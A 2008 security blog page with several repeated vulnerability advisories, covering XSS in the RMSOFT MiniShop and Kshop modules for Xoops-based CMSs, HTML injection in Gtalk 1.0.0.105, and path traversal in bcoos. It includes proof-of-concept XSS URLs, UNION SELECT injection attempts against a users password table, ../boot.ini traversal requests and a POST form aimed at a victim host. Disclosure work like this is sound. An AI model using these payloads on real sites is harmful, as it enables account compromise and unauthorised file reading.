##########################################
RMSOFT MiniShop module multiple variable XSS
Vendor url:http://redmexico.com.mx
Advisore:http://lostmon.blogspot.com/2008/08
/rmsoft-minishop-module-multiple.html
Vendor notify:no exploit available:yes
##########################################
RMSOFT MiniShop is a E-commerce php/Mysql script module
for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.
RMSOFT MiniShop contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate multiple variable upon
submission to 'search.php' script in RMSOFT MiniShop module.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.
#################
Versions
################·
RMSOFT MiniShop 1.0
it affects This type CMS Systems if we
have instaled this module:
Xoops
e-xoops
ImpressCMS
Bcoos
and other that uses xoops code and this module.
###################
Solution
###################
At this moment ,no have solution...
###################
Proof of Concept.
###################
#############
XSS
#############
vulnerable code key & idc variables in lines 35 & 36 in search.php
$key = isset($_GET['key']) ? $_GET['key'] : (isset($_POST['key']) ? $_POST['key'] : '');
$idc = isset($_GET['idc']) ? $_GET['idc'] : (isset($_POST['idc']) ? $_POST['idc'] : '');
to fix change to:
$key = isset($_GET['key']) ? htmlspecialchars($_GET['key']) : (isset($_POST['key']) ? htmlspecialchars($_POST['key']) : '');
$idc = isset($_GET['idc']) ? htmlspecialchars($_GET['idc']) : (isset($_POST['idc']) ? htmlspecialchars($_POST['idc']) : '');
vulnerable code itemsxpag variable in lines 56 to 67 in search.php :
//NUmero de resultados por página
if (isset($_GET['itemsxpag'])){
//setcookie('itemsxpag', $_GET['itemsxpag'], 86400);
$_SESSION['itemsxpag'] = $_GET['itemsxpag'];
$limit = $_GET['itemsxpag'];} else {
$limit = $_SESSION['itemsxpag'];
}if ($limit <= 0){
$limit = $xoopsModuleConfig['cols'] * 3;
$_SESSION['itemsxpag'] = $limit;}
exploit all tree variables:
http://localhost/impresscms/htdocs/modules/rmms/search.php?itemsxpag=4
"><script>alert(1)</script>&Submit=Go%21&idc=0
"><script>alert(2)</script>
&key="><script>alert(3)</script>
This is a persistent script insercion in 'itemsxpag' variable because the value
of the variable is inserted directly in '$_SESION' & '$Limit' variables.:
http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=12"><script>alert(1)</script>&Submit=Go%21&idc=
&key=lalalalalala
try to navigate to index and go again to minishop module
and try to search something in the search box of module.
Wen show the results the script executed before is
executed again.
#####################
Posible SQL Injection
#####################
wen exploit in the example of script insercion
if we look web down we have a SQL Error:
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\">' at line 2
we can try to inject some SQL code like
http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=-1/**/union/**/select/**/pass/**/form/**/x21101_users
/**/LIMIT/**/1&idc=0&key=aaa
http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=28+UNION+SELECT+pass+FROM+x21101_users+LIMIT+1
&Submit=Go%21&idc=&key=aaaaaa
and we get this error Incorrect usage of UNION and ORDER BY...
we think in a classic SQL error , but i make several test with
union select and concat , etc etc and don´t have a working exploit
..them this is a unknow impact , and need to patch
############## €nd ###################
Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Kshop module search variable and field remote XSS
Wednesday, August 06, 2008
##########################################
Kshop module search variable&field remote XSS
Vendor url:http://www.kaotik.biz/
Advisore:http://lostmon.blogspot.com/2008/08/
kshop-module-search-variable-and-field.html
Vendor notify:no exploit available:YES
##########################################
Kshop is a E-commerce php/Mysql script module for
multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.
Kshop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the
application does not validate 'Search' variable and
search form field include in this module upon
submission to 'kshop_search.php' script in Kshop module.
This could allow a user to create a specially crafted form
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss of integrity.
#################
Versions
################·
Kshop module 2.22
i make a test with ImpressCMS
and this CMS in kshop module
have version 2.23 ????
it´s posible that prior versions
are affected too.
it affects This type CMS Systems if we
have instaled this module:
Xoops
e-xoops
ImpressCMS
Bcoos
and other that uses xoops code and this module.
###################
Solution
###################
At this moment ,no have solution...
but you can make a simple patch ,open kshop_search.php
inside kshop module folder arround line 45 you have
[code]
$xoopsTpl->assign('searchTerm',$_POST['search']);
you can use strip_tags() PHP function , like:
$xoopsTpl->assign('searchTerm',strip_tags($_POST['search']));
now it´s patched , because this remove all tags in the search variable.
or you can use htmlentities() PHP function for patch much more clean like :
$xoopsTpl->assign('searchTerm',htmlentities($_POST['search']));
or ,much moore restrictive:
$xoopsTpl->assign('searchTerm',htmlspecialchars($_POST['search']));
[/code]
Happy patch !!!
###################
Proof of Concept.
###################
This Issue could not exploit directly by URL
because the form field have a limitation of 20 chars
and we need a POST to exploit ,for that we can´t exploit
directly by url because it is a GET and we need a POST.
This is not a problem, we can make a form with the POST
and without any restriction in the form field for Exploit it
put some javascript or html code in the form field
############## €nd ###################
Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Kshop module search variable&field remote XSS
Vendor url:http://www.kaotik.biz/
Advisore:http://lostmon.blogspot.com/2008/08/
kshop-module-search-variable-and-field.html
Vendor notify:no exploit available:YES
##########################################
Kshop is a E-commerce php/Mysql script module for
multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.
Kshop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the
application does not validate 'Search' variable and
search form field include in this module upon
submission to 'kshop_search.php' script in Kshop module.
This could allow a user to create a specially crafted form
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss of integrity.
#################
Versions
################·
Kshop module 2.22
i make a test with ImpressCMS
and this CMS in kshop module
have version 2.23 ????
it´s posible that prior versions
are affected too.
it affects This type CMS Systems if we
have instaled this module:
Xoops
e-xoops
ImpressCMS
Bcoos
and other that uses xoops code and this module.
###################
Solution
###################
At this moment ,no have solution...
but you can make a simple patch ,open kshop_search.php
inside kshop module folder arround line 45 you have
[code]
$xoopsTpl->assign('searchTerm',$_POST['search']);
you can use strip_tags() PHP function , like:
$xoopsTpl->assign('searchTerm',strip_tags($_POST['search']));
now it´s patched , because this remove all tags in the search variable.
or you can use htmlentities() PHP function for patch much more clean like :
$xoopsTpl->assign('searchTerm',htmlentities($_POST['search']));
or ,much moore restrictive:
$xoopsTpl->assign('searchTerm',htmlspecialchars($_POST['search']));
[/code]
Happy patch !!!
###################
Proof of Concept.
###################
This Issue could not exploit directly by URL
because the form field have a limitation of 20 chars
and we need a POST to exploit ,for that we can´t exploit
directly by url because it is a GET and we need a POST.
This is not a problem, we can make a form with the POST
and without any restriction in the form field for Exploit it
put some javascript or html code in the form field
Example: "><script>alert()</script>
its necesary that you put "> before the code.
<form action="http://[victim]/modules/kshop/kshop_search.php" method="POST">
<input type="text" name="search" value="Put your XSS Here !!!">
<input type="image" src="http://www.spymac.com/upload/2007/01/18/OQxsPeTzFN.gif"></form>
############## €nd ###################
Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Gtalk 1.0.0.105 html injection and Stealing messages
Wednesday, June 25, 2008
############################################
Gtalk 1.0.0.105 html injection and Stealing messages
Vendor url:http://www.google.com
Advisore:http://lostmon.blogspot.com/2008/06/
gtalk-100105-html-injection-and.html
Vendor notify:yes exploit available:yes
############################################
GTalk is a service offered by Google instant messaging.
It allows communication via traditional text or voice and is
also integrated with Gmail. According to information released
last year, Google Talk is used by more than 3 million users
worldwide.
GTalk contains a flaw that allows a remote
cross site scripting or HTML injection attack.This flaw
exists because the application does not validate 'http'
and 'mailto' upon submission to conversation window.
This could allow a user to create a specially crafted URL
or mailto address that would execute arbitrary code
in a user's gtalk within the trust relationship
between the gtalk and the server,leading loss of integrity
A remote user can Stealing messages on the target Gtalk user.
################
Versions afected
################
This Issue aparently no affects Gtalk labs edition
( testing without results)
This issue aparenly no affects Gtalk Web user
( testing without results in web client from Mail.google.com)
This issue aparently no afects Gtalk Gadget users
(testing without results in web client from http://talkgadget.google.com/talkgadget/popout?hl=es)
##################
TIme line
##################
discovered: 05-06-2008
Vendor notify: 07-06-2008
Vendor reponse: 07-06-2008
Vendor fix:
Public Disclosure: 25-06-2007
########################
Solution
########################
No solution at this time , however all users with a
vulnerable Gtalk client, can talk without problems
with Google talk labs edition, or by Web client in
Gmail account , or they can use the Google Gtalk Gadget.
################################
How to reproduce or how to test:
################################
#################
HTML Injection
#################
For this test we need two accounts of Gmail (attacker
and Victim), and Gtalk version 1.0.0.105
In this text We only send a h1 html tag with a text and
it is executed in the victims Gtalk.
let´s Go !!!
1- Open one account in explorer ( go to mail.google.com
and make login with the attacker mail)
2- Open the second account in Gtalk ( open Gtalk and make
loging with victim´s mail)
3- In the attacker accound open a chat with the victims
4- Write this msg To victim http://"><h1>Lostmon</h1>
Wen gtalk try to convert the text link in a clicable URL,the html
tag 'h1' is executed in the victim´s machine; and now all what
the attacker write , have the attribute 'h1' in the victim´s Machine.
For solve this situation , the gtalk user need to write something
to attacker.
If Gtalk user try to send the same malformed link to a webuser,
it is executed in his machine and it does not work in the webuser
machine and he only have a clicable link and part of the url with
the html, is not clicable . them the Gtalk users via web are not
vulnerable.
if the Gtalk user (victim) try to send it to the webuser (attacker)
the html is executend in the Gtalk client and now all what victims
write has the attibute 'h1' ..... for solve the attacker need to send any
text to victim, and now the conversation window are free of 'h1' html tag.
I make several probes with other tags ,like script or img , but at
this moment i can´t bypass the filter or i can´t look ...moore Deep :P
This issue comes in Gtalk wen try to conver text in a clicable url ,
this flaw affects to mailto function too !!!
We can do the same test but wen try to send the msg send this
mailto:"><h1>Lostmon</h1>.
Continue Testing with Gtalk labs edition as the attacker and
gtalk 1.0.0.105 as the victim and the attacker can send to
victims with the same result.
We can try to insert other html tag like script , and aparently if we
look the sorce code of the Gtalk window it is executed, but does no
appear nothing ....send to victim :
http://"><h1>Lostmon</h1> and
look for the source code of the Gtalk window.
If the attackers send to victims:
http://"><h1>Lostmon</h1>
Gtalk only convert this url in his html value
http://"><h1>Lostmon</h1>
but don´t execute ...
Gtalk accept html encoding them !!!
#######################################
source in victims conversation window
########################################
<DIV class="msg 1st"><SPAN style="FONT-WEIGHT: bold">Lostmon</SPAN>:
<A href='http://"></a href=""><h1>Lostmon</h1'>http://"></A>
<H1>Lostmon</H1</a>></DIV>
###########################
Proof Of Messages Stealing
###########################
Try the attacker send with Gtalk labs edition and victim with gtalk 1.0.0.105
If victim has enable notifications for example wen others users talking to he
and he have minimice Gtalk,a attacker can send to he :
http://"><script>alert()</script>
or
mailto:"><script>alert()</script>
And continue talk with the victim , has only in his window http://">
but it the attacker continue talking with he
the victim only can view what say the attacker by notifications
for a few seconds because wen look his window he only has http://">
This can be used to talk Stealing of to other type of spoffing attacks.
This situation is end wen the victim talk to attacker.
If the victim´s send to attacker http://"><script>alert()</script> ,
them the victim can´t look any text what he send.
the victims need that,the attackers send a msg to victim for solve this
situation , and now the victim can look again his mesages.
#################
Conclusion
#################
With the result of all of this test, we can think that only the html
filter for Gtalk 1.0.0.105 does not work properly and this can be a potential
Vulnerability because a attacker can execute html code in the victim´s machine
and the attacker can stealing menssages in victim´s machine ....
########################€nd##################
Thnx to estrella to be my light.
Thnx To FalconDeOro For his support.
Thnx to Imydes From www.imydes.com For testing with me.
Thnx To all Lostmon Group Team For his continue support
Thnx to all Google security Team for his patience and fast Response
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Gtalk 1.0.0.105 html injection and Stealing messages
Vendor url:http://www.google.com
Advisore:http://lostmon.blogspot.com/2008/06/
gtalk-100105-html-injection-and.html
Vendor notify:yes exploit available:yes
############################################
This post was Updated on 12-07-2008
Aparently this flaw now is fixed for exploit remote, but it
continue still vulnerable in a local mode example
before patch if a attacker send to victim mailto: "><h1>Lostmon</h1>
it is executed in the victims gtalk 1.0.0.105
affter the patch the server converts mailto:"><h1>Lostmon</h1> in
mailto: h1 Lostmon /h1 (very good )
but if the victims send to attacker the code, it continue
executing in the victim's machine , then ... the posible
exploit of this issue for remote users are pached !!!!! Good work ,
It continue vulnerable at local exploit. :|
GTalk is a service offered by Google instant messaging.
It allows communication via traditional text or voice and is
also integrated with Gmail. According to information released
last year, Google Talk is used by more than 3 million users
worldwide.
GTalk contains a flaw that allows a remote
cross site scripting or HTML injection attack.This flaw
exists because the application does not validate 'http'
and 'mailto' upon submission to conversation window.
This could allow a user to create a specially crafted URL
or mailto address that would execute arbitrary code
in a user's gtalk within the trust relationship
between the gtalk and the server,leading loss of integrity
A remote user can Stealing messages on the target Gtalk user.
################
Versions afected
################
This Issue aparently no affects Gtalk labs edition
( testing without results)
This issue aparenly no affects Gtalk Web user
( testing without results in web client from Mail.google.com)
This issue aparently no afects Gtalk Gadget users
(testing without results in web client from http://talkgadget.google.com/talkgadget/popout?hl=es)
##################
TIme line
##################
discovered: 05-06-2008
Vendor notify: 07-06-2008
Vendor reponse: 07-06-2008
Vendor fix:
Public Disclosure: 25-06-2007
########################
Solution
########################
No solution at this time , however all users with a
vulnerable Gtalk client, can talk without problems
with Google talk labs edition, or by Web client in
Gmail account , or they can use the Google Gtalk Gadget.
################################
How to reproduce or how to test:
################################
#################
HTML Injection
#################
For this test we need two accounts of Gmail (attacker
and Victim), and Gtalk version 1.0.0.105
In this text We only send a h1 html tag with a text and
it is executed in the victims Gtalk.
let´s Go !!!
1- Open one account in explorer ( go to mail.google.com
and make login with the attacker mail)
2- Open the second account in Gtalk ( open Gtalk and make
loging with victim´s mail)
3- In the attacker accound open a chat with the victims
4- Write this msg To victim http://"><h1>Lostmon</h1>
Wen gtalk try to convert the text link in a clicable URL,the html
tag 'h1' is executed in the victim´s machine; and now all what
the attacker write , have the attribute 'h1' in the victim´s Machine.
For solve this situation , the gtalk user need to write something
to attacker.
If Gtalk user try to send the same malformed link to a webuser,
it is executed in his machine and it does not work in the webuser
machine and he only have a clicable link and part of the url with
the html, is not clicable . them the Gtalk users via web are not
vulnerable.
if the Gtalk user (victim) try to send it to the webuser (attacker)
the html is executend in the Gtalk client and now all what victims
write has the attibute 'h1' ..... for solve the attacker need to send any
text to victim, and now the conversation window are free of 'h1' html tag.
I make several probes with other tags ,like script or img , but at
this moment i can´t bypass the filter or i can´t look ...moore Deep :P
This issue comes in Gtalk wen try to conver text in a clicable url ,
this flaw affects to mailto function too !!!
We can do the same test but wen try to send the msg send this
mailto:"><h1>Lostmon</h1>.
Continue Testing with Gtalk labs edition as the attacker and
gtalk 1.0.0.105 as the victim and the attacker can send to
victims with the same result.
We can try to insert other html tag like script , and aparently if we
look the sorce code of the Gtalk window it is executed, but does no
appear nothing ....send to victim :
http://"><h1>Lostmon</h1> and
look for the source code of the Gtalk window.
If the attackers send to victims:
http://"><h1>Lostmon</h1>
Gtalk only convert this url in his html value
http://"><h1>Lostmon</h1>
but don´t execute ...
Gtalk accept html encoding them !!!
#######################################
source in victims conversation window
########################################
<DIV class="msg 1st"><SPAN style="FONT-WEIGHT: bold">Lostmon</SPAN>:
<A href='http://"></a href=""><h1>Lostmon</h1'>http://"></A>
<H1>Lostmon</H1</a>></DIV>
###########################
Proof Of Messages Stealing
###########################
Try the attacker send with Gtalk labs edition and victim with gtalk 1.0.0.105
If victim has enable notifications for example wen others users talking to he
and he have minimice Gtalk,a attacker can send to he :
http://"><script>alert()</script>
or
mailto:"><script>alert()</script>
And continue talk with the victim , has only in his window http://">
but it the attacker continue talking with he
the victim only can view what say the attacker by notifications
for a few seconds because wen look his window he only has http://">
This can be used to talk Stealing of to other type of spoffing attacks.
This situation is end wen the victim talk to attacker.
If the victim´s send to attacker http://"><script>alert()</script> ,
them the victim can´t look any text what he send.
the victims need that,the attackers send a msg to victim for solve this
situation , and now the victim can look again his mesages.
#################
Conclusion
#################
With the result of all of this test, we can think that only the html
filter for Gtalk 1.0.0.105 does not work properly and this can be a potential
Vulnerability because a attacker can execute html code in the victim´s machine
and the attacker can stealing menssages in victim´s machine ....
########################€nd##################
Thnx to estrella to be my light.
Thnx To FalconDeOro For his support.
Thnx to Imydes From www.imydes.com For testing with me.
Thnx To all Lostmon Group Team For his continue support
Thnx to all Google security Team for his patience and fast Response
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Bcoos highlight.php traversal file access
Sunday, May 18, 2008
####################################
Bcoos =< 1.0.13 highlight.php traversal file access
Vendor URL: http://www.bcoos.net
Advisore:http://lostmon.blogspot.com/2008/05/
bcoos-highlightphp-traversal-file.html
Vendor notify:yes Exploit available:yes
####################################
bcoos is content-community management system written in PHP-MySQL
Directory traversal vulnerability in bcoos 1.0.13 and earlier
allows remote attackers to read arbitrary files via a ../
(dot dot) in the CD command or if the attacker know the full path.
Only Can read Files with extension, if the file don´t have extension
bcoos redirect to index.
##############
Versions
##############
bcoos 1.0.13
bcoos 1.0.12
bcoos 1.0.11
bcoos 1.0.10
bcoos 1.0.9
##############
Solution
##############
No solutions was available at this time !!!
Vendor Bugtrack : http://www.bcoos.net/modules/
devtracker/view_issue.php?issue_id=2467
##############
TimeLine
##############
Discovered:02-03-2008
vendor notify:18-05-2008
vendor response:
vendor fix:
Disclosure:18-05-2008
################
Proof of Concept
################
http://localhost/bcoos/class/debug/
highlight.php?file=C:\boot.ini
http://localhost/bcoos/class/debug/
highlight.php?file=../../../../../boot.ini
For exploit this issue the attacker need webmaster privileges.
But if a system has multiple webmasters.. all can read files
outside webserver root directory.
The file what we want to access need a extension if the file no
have extensionvwe can´t read it, and bcoos redirects to index.
################€nd##################
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Bcoos =< 1.0.13 highlight.php traversal file access
Vendor URL: http://www.bcoos.net
Advisore:http://lostmon.blogspot.com/2008/05/
bcoos-highlightphp-traversal-file.html
Vendor notify:yes Exploit available:yes
####################################
bcoos is content-community management system written in PHP-MySQL
Directory traversal vulnerability in bcoos 1.0.13 and earlier
allows remote attackers to read arbitrary files via a ../
(dot dot) in the CD command or if the attacker know the full path.
Only Can read Files with extension, if the file don´t have extension
bcoos redirect to index.
##############
Versions
##############
bcoos 1.0.13
bcoos 1.0.12
bcoos 1.0.11
bcoos 1.0.10
bcoos 1.0.9
##############
Solution
##############
No solutions was available at this time !!!
Vendor Bugtrack : http://www.bcoos.net/modules/
devtracker/view_issue.php?issue_id=2467
##############
TimeLine
##############
Discovered:02-03-2008
vendor notify:18-05-2008
vendor response:
vendor fix:
Disclosure:18-05-2008
################
Proof of Concept
################
http://localhost/bcoos/class/debug/
highlight.php?file=C:\boot.ini
http://localhost/bcoos/class/debug/
highlight.php?file=../../../../../boot.ini
For exploit this issue the attacker need webmaster privileges.
But if a system has multiple webmasters.. all can read files
outside webserver root directory.
The file what we want to access need a extension if the file no
have extensionvwe can´t read it, and bcoos redirects to index.
################€nd##################
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)